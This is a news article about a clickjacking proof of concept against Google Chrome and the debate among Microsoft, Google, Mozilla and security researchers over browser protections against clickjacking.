First Microsoft touts clickjacking protections in Internet Explorer 8, then a security researcher releases a proof of concept for a clickjacking attack targeting the Google Chrome Web browser. Clickjacking, some say, remains an issue that will require cooperation in the security community.
Clickjacking is not going away.
The same week Microsoft announced on Jan. 26 it had put protections
against clickjacking in Internet Explorer 8, security researcher Aditya Sood
posted on BugTraq on Jan. 29 a new clickjacking advisory for
the Google Chrome browser,
with a link to a proof of concept.
Officials at Google said they are aware of the issue, which affects Chrome
versions 18.104.22.168 and earlier. So far, Google says it has not seen any
attempts to exploit this vulnerability in the wild. Though the posted advisory
only mentions Google Chrome, there are reports that the same vulnerability
affects Mozilla's Firefox 3.0.5 as well-though this can
be mitigated by using the ClearClick anti-clickjacking feature contained in the
NoScript plug-in for Firefox.
Internet Explorer 7 does not seem to be affected by Sood's method.
Still, clickjacking has affected all the major browsers. The technique was
publicized in 2008 by security researchers Jeremiah Grossman, CTO
of WhiteHat Security, and Robert Hansen. If done successfully,
clickjacking can trick users into clicking on links without their
knowledge and effectively circumvents cross-site request forgery protections
that attempt to confirm transactions with the user.
In Sood's proof of concept,
users click on what appears to be a link to Yahoo.com, but
actually directs them to a site about cross-site scripting. Sood wrote:
A clickjacked page tricks a user into
performing undesired actions by clicking on a concealed link. On a clickjacked
page, the attackers show a set of dummy buttons, then load another page over it
in a transparent layer. The user thinks he is clicking the visible buttons,
while he/she is actually performing actions on the hidden page.
The hidden page may be an
authentic page, and therefore the attackers can trick users into performing
actions which the users never intended to do and there is no way of tracing
such actions later, as the user was genuinely authenticated on the other page.
While Sood's post focused on Google Chrome, a Google spokesperson was quick
to point out that clickjacking is a larger issue that affects all Web browsers.
"The issue is tied to the way the Web and Web pages were designed to
work, and there is no simple fix for any particular browser," the
spokesperson said. "We are working with other stakeholders to come up with
a standardized long-term mitigation approach."
put protection against clickjacking
in the release candidate for Internet
Explorer 8, critics
contend that Microsoft's IE 8 RC 1 clickjacking solution
"While it's positive that Microsoft has chosen to do something to
safeguard against clickjacking, the new security feature offers very limited
protections," Grossman said. "Web site owners can do more to protect
their visitors, but unfortunately the average Web citizen still has no way to
defend themselves on their own. So most experts will agree the
anti-clickjacking feature will do little to stem the near-term risk."
Grossman suggested browser vendors consider bundling in the NoScript Firefox
plug-in by default.
"NoScript has powerful security features that can prevent clickjacking
as well as many other Web-based attacks, which also allows users to tune their
own level of desired security," he added. "For Internet Explorer,
Opera, Google Chrome, etc., they should embed similar features and
functionality in their products."
Johnathan Nightingale, a security researcher for Mozilla, said Mozilla's
efforts around preventing clickjacking have been more focused on comprehensive
solutions like its Content Security Policy proposal and implementing the Origin
header to thwart cross-site request forgery attacks.
"We've discussed these publicly with other
browser makers and the broader Web security community to ensure that we are
helping them prevent the attacks they're concerned about, and to benefit from
their experience," Nightingale said. "Changing the way we do security
on the Internet needs to be a group effort, and we'd welcome the participation
of the IE team in that work."